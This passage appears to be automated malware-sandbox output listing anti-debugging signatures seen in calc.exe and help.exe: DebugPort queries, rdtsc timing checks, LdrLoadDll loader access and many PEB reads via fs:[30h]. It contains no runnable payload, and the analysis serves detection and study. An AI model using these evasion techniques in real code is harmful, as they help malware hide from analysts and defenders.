Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\calc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_00409A80 rdtsc 9_2_00409A80
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0040ACC0 LdrLoadDll, 9_2_0040ACC0
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03478B58 mov eax, dword ptr fs:[00000030h] 9_2_03478B58
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D3B7A mov eax, dword ptr fs:[00000030h] 9_2_033D3B7A
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033ADB60 mov ecx, dword ptr fs:[00000030h] 9_2_033ADB60
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0346131B mov eax, dword ptr fs:[00000030h] 9_2_0346131B
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033AF358 mov eax, dword ptr fs:[00000030h] 9_2_033AF358
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033ADB40 mov eax, dword ptr fs:[00000030h] 9_2_033ADB40
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_034253CA mov eax, dword ptr fs:[00000030h] 9_2_034253CA
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D4BAD mov eax, dword ptr fs:[00000030h] 9_2_033D4BAD
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D2397 mov eax, dword ptr fs:[00000030h] 9_2_033D2397
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033DB390 mov eax, dword ptr fs:[00000030h] 9_2_033DB390
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033B1B8F mov eax, dword ptr fs:[00000030h] 9_2_033B1B8F
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0345D380 mov ecx, dword ptr fs:[00000030h] 9_2_0345D380
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0346138A mov eax, dword ptr fs:[00000030h] 9_2_0346138A
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033CDBE9 mov eax, dword ptr fs:[00000030h] 9_2_033CDBE9
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D03E2 mov eax, dword ptr fs:[00000030h] 9_2_033D03E2
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03475BA5 mov eax, dword ptr fs:[00000030h] 9_2_03475BA5
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E4A2C mov eax, dword ptr fs:[00000030h] 9_2_033E4A2C
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03434257 mov eax, dword ptr fs:[00000030h] 9_2_03434257
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033C3A1C mov eax, dword ptr fs:[00000030h] 9_2_033C3A1C
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0345B260 mov eax, dword ptr fs:[00000030h] 9_2_0345B260
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03478A62 mov eax, dword ptr fs:[00000030h] 9_2_03478A62
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033A5210 mov eax, dword ptr fs:[00000030h] 9_2_033A5210
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033A5210 mov ecx, dword ptr fs:[00000030h] 9_2_033A5210
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033AAA16 mov eax, dword ptr fs:[00000030h] 9_2_033AAA16
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033B8A0A mov eax, dword ptr fs:[00000030h] 9_2_033B8A0A
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E927A mov eax, dword ptr fs:[00000030h] 9_2_033E927A
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033A9240 mov eax, dword ptr fs:[00000030h] 9_2_033A9240
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033BAAB0 mov eax, dword ptr fs:[00000030h] 9_2_033BAAB0
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033DFAB0 mov eax, dword ptr fs:[00000030h] 9_2_033DFAB0
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033A52A5 mov eax, dword ptr fs:[00000030h] 9_2_033A52A5
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033DD294 mov eax, dword ptr fs:[00000030h] 9_2_033DD294
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D2AE4 mov eax, dword ptr fs:[00000030h] 9_2_033D2AE4
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D2ACB mov eax, dword ptr fs:[00000030h] 9_2_033D2ACB
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D513A mov eax, dword ptr fs:[00000030h] 9_2_033D513A
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033C4120 mov eax, dword ptr fs:[00000030h] 9_2_033C4120
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033C4120 mov ecx, dword ptr fs:[00000030h] 9_2_033C4120
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033A9100 mov eax, dword ptr fs:[00000030h] 9_2_033A9100
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033AB171 mov eax, dword ptr fs:[00000030h] 9_2_033AB171
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033AC962 mov eax, dword ptr fs:[00000030h] 9_2_033AC962
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033CB944 mov eax, dword ptr fs:[00000030h] 9_2_033CB944
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D61A0 mov eax, dword ptr fs:[00000030h] 9_2_033D61A0
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_034341E8 mov eax, dword ptr fs:[00000030h] 9_2_034341E8
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D2990 mov eax, dword ptr fs:[00000030h] 9_2_033D2990
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033DA185 mov eax, dword ptr fs:[00000030h] 9_2_033DA185
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033CC182 mov eax, dword ptr fs:[00000030h] 9_2_033CC182
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033AB1E1 mov eax, dword ptr fs:[00000030h] 9_2_033AB1E1
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_034269A6 mov eax, dword ptr fs:[00000030h] 9_2_034269A6
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_034251BE mov eax, dword ptr fs:[00000030h] 9_2_034251BE
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D002D mov eax, dword ptr fs:[00000030h] 9_2_033D002D
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033BB02A mov eax, dword ptr fs:[00000030h] 9_2_033BB02A
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03471074 mov eax, dword ptr fs:[00000030h] 9_2_03471074
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03462073 mov eax, dword ptr fs:[00000030h] 9_2_03462073
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03474015 mov eax, dword ptr fs:[00000030h] 9_2_03474015
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03427016 mov eax, dword ptr fs:[00000030h] 9_2_03427016
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033C0050 mov eax, dword ptr fs:[00000030h] 9_2_033C0050
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033DF0BF mov ecx, dword ptr fs:[00000030h] 9_2_033DF0BF
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033DF0BF mov eax, dword ptr fs:[00000030h] 9_2_033DF0BF
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E90AF mov eax, dword ptr fs:[00000030h] 9_2_033E90AF
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0343B8D0 mov eax, dword ptr fs:[00000030h] 9_2_0343B8D0
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0343B8D0 mov ecx, dword ptr fs:[00000030h] 9_2_0343B8D0
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D20A0 mov eax, dword ptr fs:[00000030h] 9_2_033D20A0
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033A9080 mov eax, dword ptr fs:[00000030h] 9_2_033A9080
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03423884 mov eax, dword ptr fs:[00000030h] 9_2_03423884
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033A58EC mov eax, dword ptr fs:[00000030h] 9_2_033A58EC
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033DE730 mov eax, dword ptr fs:[00000030h] 9_2_033DE730
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033A4F2E mov eax, dword ptr fs:[00000030h] 9_2_033A4F2E
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033CF716 mov eax, dword ptr fs:[00000030h] 9_2_033CF716
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03478F6A mov eax, dword ptr fs:[00000030h] 9_2_03478F6A
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033DA70E mov eax, dword ptr fs:[00000030h] 9_2_033DA70E
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0347070D mov eax, dword ptr fs:[00000030h] 9_2_0347070D
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0343FF10 mov eax, dword ptr fs:[00000030h] 9_2_0343FF10
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033BFF60 mov eax, dword ptr fs:[00000030h] 9_2_033BFF60
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033BEF40 mov eax, dword ptr fs:[00000030h] 9_2_033BEF40
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033B8794 mov eax, dword ptr fs:[00000030h] 9_2_033B8794
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E37F5 mov eax, dword ptr fs:[00000030h] 9_2_033E37F5
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03427794 mov eax, dword ptr fs:[00000030h] 9_2_03427794
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033AE620 mov eax, dword ptr fs:[00000030h] 9_2_033AE620
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033DA61C mov eax, dword ptr fs:[00000030h] 9_2_033DA61C
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033AC600 mov eax, dword ptr fs:[00000030h] 9_2_033AC600
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D8E00 mov eax, dword ptr fs:[00000030h] 9_2_033D8E00
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03461608 mov eax, dword ptr fs:[00000030h] 9_2_03461608
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033CAE73 mov eax, dword ptr fs:[00000030h] 9_2_033CAE73
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033B766D mov eax, dword ptr fs:[00000030h] 9_2_033B766D
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0345FE3F mov eax, dword ptr fs:[00000030h] 9_2_0345FE3F
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033B7E41 mov eax, dword ptr fs:[00000030h] 9_2_033B7E41
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0345FEC0 mov eax, dword ptr fs:[00000030h] 9_2_0345FEC0
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03478ED6 mov eax, dword ptr fs:[00000030h] 9_2_03478ED6
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0343FE87 mov eax, dword ptr fs:[00000030h] 9_2_0343FE87
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033B76E2 mov eax, dword ptr fs:[00000030h] 9_2_033B76E2
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D16E0 mov ecx, dword ptr fs:[00000030h] 9_2_033D16E0
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03470EA5 mov eax, dword ptr fs:[00000030h] 9_2_03470EA5
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_034246A7 mov eax, dword ptr fs:[00000030h] 9_2_034246A7
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D36CC mov eax, dword ptr fs:[00000030h] 9_2_033D36CC
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E8EC7 mov eax, dword ptr fs:[00000030h] 9_2_033E8EC7
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03423540 mov eax, dword ptr fs:[00000030h] 9_2_03423540
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D4D3B mov eax, dword ptr fs:[00000030h] 9_2_033D4D3B
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033AAD30 mov eax, dword ptr fs:[00000030h] 9_2_033AAD30
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033B3D34 mov eax, dword ptr fs:[00000030h] 9_2_033B3D34
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033CC577 mov eax, dword ptr fs:[00000030h] 9_2_033CC577
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033C7D50 mov eax, dword ptr fs:[00000030h] 9_2_033C7D50
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03478D34 mov eax, dword ptr fs:[00000030h] 9_2_03478D34
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0342A537 mov eax, dword ptr fs:[00000030h] 9_2_0342A537
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033E3D43 mov eax, dword ptr fs:[00000030h] 9_2_033E3D43
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D1DB5 mov eax, dword ptr fs:[00000030h] 9_2_033D1DB5
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03426DC9 mov eax, dword ptr fs:[00000030h] 9_2_03426DC9
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03426DC9 mov ecx, dword ptr fs:[00000030h] 9_2_03426DC9
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D35A1 mov eax, dword ptr fs:[00000030h] 9_2_033D35A1
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033DFD9B mov eax, dword ptr fs:[00000030h] 9_2_033DFD9B
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033A2D8A mov eax, dword ptr fs:[00000030h] 9_2_033A2D8A
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03458DF1 mov eax, dword ptr fs:[00000030h] 9_2_03458DF1
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033D2581 mov eax, dword ptr fs:[00000030h] 9_2_033D2581
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033BD5E0 mov eax, dword ptr fs:[00000030h] 9_2_033BD5E0
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_034705AC mov eax, dword ptr fs:[00000030h] 9_2_034705AC
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033DBC2C mov eax, dword ptr fs:[00000030h] 9_2_033DBC2C
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0343C450 mov eax, dword ptr fs:[00000030h] 9_2_0343C450
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03461C06 mov eax, dword ptr fs:[00000030h] 9_2_03461C06
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03426C0A mov eax, dword ptr fs:[00000030h] 9_2_03426C0A
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_0347740D mov eax, dword ptr fs:[00000030h] 9_2_0347740D
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033C746D mov eax, dword ptr fs:[00000030h] 9_2_033C746D
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033DA44B mov eax, dword ptr fs:[00000030h] 9_2_033DA44B
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03478CD6 mov eax, dword ptr fs:[00000030h] 9_2_03478CD6
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_033B849B mov eax, dword ptr fs:[00000030h] 9_2_033B849B
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_03426CF0 mov eax, dword ptr fs:[00000030h] 9_2_03426CF0
Source: C:\Windows\SysWOW64\calc.exe Code function: 9_2_034614FB mov eax, dword ptr fs:[00000030h] 9_2_034614FB
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A852A5 mov eax, dword ptr fs:[00000030h] 19_2_02A852A5
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B50EA5 mov eax, dword ptr fs:[00000030h] 19_2_02B50EA5
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B046A7 mov eax, dword ptr fs:[00000030h] 19_2_02B046A7
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A9AAB0 mov eax, dword ptr fs:[00000030h] 19_2_02A9AAB0
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02ABFAB0 mov eax, dword ptr fs:[00000030h] 19_2_02ABFAB0
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B1FE87 mov eax, dword ptr fs:[00000030h] 19_2_02B1FE87
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02ABD294 mov eax, dword ptr fs:[00000030h] 19_2_02ABD294
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AB16E0 mov ecx, dword ptr fs:[00000030h] 19_2_02AB16E0
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A976E2 mov eax, dword ptr fs:[00000030h] 19_2_02A976E2
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B58ED6 mov eax, dword ptr fs:[00000030h] 19_2_02B58ED6
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AB36CC mov eax, dword ptr fs:[00000030h] 19_2_02AB36CC
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC8EC7 mov eax, dword ptr fs:[00000030h] 19_2_02AC8EC7
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B3FEC0 mov eax, dword ptr fs:[00000030h] 19_2_02B3FEC0
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A8E620 mov eax, dword ptr fs:[00000030h] 19_2_02A8E620
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B3FE3F mov eax, dword ptr fs:[00000030h] 19_2_02B3FE3F
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A8C600 mov eax, dword ptr fs:[00000030h] 19_2_02A8C600
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AA3A1C mov eax, dword ptr fs:[00000030h] 19_2_02AA3A1C
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02ABA61C mov eax, dword ptr fs:[00000030h] 19_2_02ABA61C
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A9766D mov eax, dword ptr fs:[00000030h] 19_2_02A9766D
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B3B260 mov eax, dword ptr fs:[00000030h] 19_2_02B3B260
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC927A mov eax, dword ptr fs:[00000030h] 19_2_02AC927A
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B58A62 mov eax, dword ptr fs:[00000030h] 19_2_02B58A62
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AAAE73 mov eax, dword ptr fs:[00000030h] 19_2_02AAAE73
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B14257 mov eax, dword ptr fs:[00000030h] 19_2_02B14257
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A89240 mov eax, dword ptr fs:[00000030h] 19_2_02A89240
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A97E41 mov eax, dword ptr fs:[00000030h] 19_2_02A97E41
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B55BA5 mov eax, dword ptr fs:[00000030h] 19_2_02B55BA5
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B07794 mov eax, dword ptr fs:[00000030h] 19_2_02B07794
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A91B8F mov eax, dword ptr fs:[00000030h] 19_2_02A91B8F
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B3D380 mov ecx, dword ptr fs:[00000030h] 19_2_02B3D380
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02ABB390 mov eax, dword ptr fs:[00000030h] 19_2_02ABB390
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B4138A mov eax, dword ptr fs:[00000030h] 19_2_02B4138A
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC37F5 mov eax, dword ptr fs:[00000030h] 19_2_02AC37F5
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A84F2E mov eax, dword ptr fs:[00000030h] 19_2_02A84F2E
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02ABE730 mov eax, dword ptr fs:[00000030h] 19_2_02ABE730
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B1FF10 mov eax, dword ptr fs:[00000030h] 19_2_02B1FF10
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02ABA70E mov eax, dword ptr fs:[00000030h] 19_2_02ABA70E
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B4131B mov eax, dword ptr fs:[00000030h] 19_2_02B4131B
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B5070D mov eax, dword ptr fs:[00000030h] 19_2_02B5070D
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AAF716 mov eax, dword ptr fs:[00000030h] 19_2_02AAF716
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A8DB60 mov ecx, dword ptr fs:[00000030h] 19_2_02A8DB60
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A9FF60 mov eax, dword ptr fs:[00000030h] 19_2_02A9FF60
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AB3B7A mov eax, dword ptr fs:[00000030h] 19_2_02AB3B7A
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B58F6A mov eax, dword ptr fs:[00000030h] 19_2_02B58F6A
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A8DB40 mov eax, dword ptr fs:[00000030h] 19_2_02A8DB40
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A9EF40 mov eax, dword ptr fs:[00000030h] 19_2_02A9EF40
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B58B58 mov eax, dword ptr fs:[00000030h] 19_2_02B58B58
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A8F358 mov eax, dword ptr fs:[00000030h] 19_2_02A8F358
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AC90AF mov eax, dword ptr fs:[00000030h] 19_2_02AC90AF
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02ABF0BF mov ecx, dword ptr fs:[00000030h] 19_2_02ABF0BF
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02ABF0BF mov eax, dword ptr fs:[00000030h] 19_2_02ABF0BF
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A89080 mov eax, dword ptr fs:[00000030h] 19_2_02A89080
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A9849B mov eax, dword ptr fs:[00000030h] 19_2_02A9849B
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B03884 mov eax, dword ptr fs:[00000030h] 19_2_02B03884
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B06CF0 mov eax, dword ptr fs:[00000030h] 19_2_02B06CF0
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B414FB mov eax, dword ptr fs:[00000030h] 19_2_02B414FB
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B1B8D0 mov eax, dword ptr fs:[00000030h] 19_2_02B1B8D0
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B1B8D0 mov ecx, dword ptr fs:[00000030h] 19_2_02B1B8D0
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B58CD6 mov eax, dword ptr fs:[00000030h] 19_2_02B58CD6
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A9B02A mov eax, dword ptr fs:[00000030h] 19_2_02A9B02A
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02ABBC2C mov eax, dword ptr fs:[00000030h] 19_2_02ABBC2C
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B54015 mov eax, dword ptr fs:[00000030h] 19_2_02B54015
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B07016 mov eax, dword ptr fs:[00000030h] 19_2_02B07016
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B41C06 mov eax, dword ptr fs:[00000030h] 19_2_02B41C06
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B5740D mov eax, dword ptr fs:[00000030h] 19_2_02B5740D
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B06C0A mov eax, dword ptr fs:[00000030h] 19_2_02B06C0A
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B51074 mov eax, dword ptr fs:[00000030h] 19_2_02B51074
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B42073 mov eax, dword ptr fs:[00000030h] 19_2_02B42073
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AA746D mov eax, dword ptr fs:[00000030h] 19_2_02AA746D
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02ABA44B mov eax, dword ptr fs:[00000030h] 19_2_02ABA44B
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B1C450 mov eax, dword ptr fs:[00000030h] 19_2_02B1C450
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AA0050 mov eax, dword ptr fs:[00000030h] 19_2_02AA0050
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AB35A1 mov eax, dword ptr fs:[00000030h] 19_2_02AB35A1
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AB61A0 mov eax, dword ptr fs:[00000030h] 19_2_02AB61A0
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A82D8A mov eax, dword ptr fs:[00000030h] 19_2_02A82D8A
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AAC182 mov eax, dword ptr fs:[00000030h] 19_2_02AAC182
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02ABA185 mov eax, dword ptr fs:[00000030h] 19_2_02ABA185
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02ABFD9B mov eax, dword ptr fs:[00000030h] 19_2_02ABFD9B
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B38DF1 mov eax, dword ptr fs:[00000030h] 19_2_02B38DF1
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A8B1E1 mov eax, dword ptr fs:[00000030h] 19_2_02A8B1E1
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A9D5E0 mov eax, dword ptr fs:[00000030h] 19_2_02A9D5E0
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B141E8 mov eax, dword ptr fs:[00000030h] 19_2_02B141E8
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B58D34 mov eax, dword ptr fs:[00000030h] 19_2_02B58D34
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02B0A537 mov eax, dword ptr fs:[00000030h] 19_2_02B0A537
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AA4120 mov eax, dword ptr fs:[00000030h] 19_2_02AA4120
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AA4120 mov ecx, dword ptr fs:[00000030h] 19_2_02AA4120
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AB4D3B mov eax, dword ptr fs:[00000030h] 19_2_02AB4D3B
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AB513A mov eax, dword ptr fs:[00000030h] 19_2_02AB513A
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02AB513A mov eax, dword ptr fs:[00000030h] 19_2_02AB513A
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A8AD30 mov eax, dword ptr fs:[00000030h] 19_2_02A8AD30
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h] 19_2_02A93D34
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h] 19_2_02A93D34
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h] 19_2_02A93D34
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h] 19_2_02A93D34
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h] 19_2_02A93D34
Source: C:\Windows\SysWOW64\help.exe Code function: 19_2_02A93D34 mov eax, dword ptr fs:[00000030h] 19_2_02A93D34
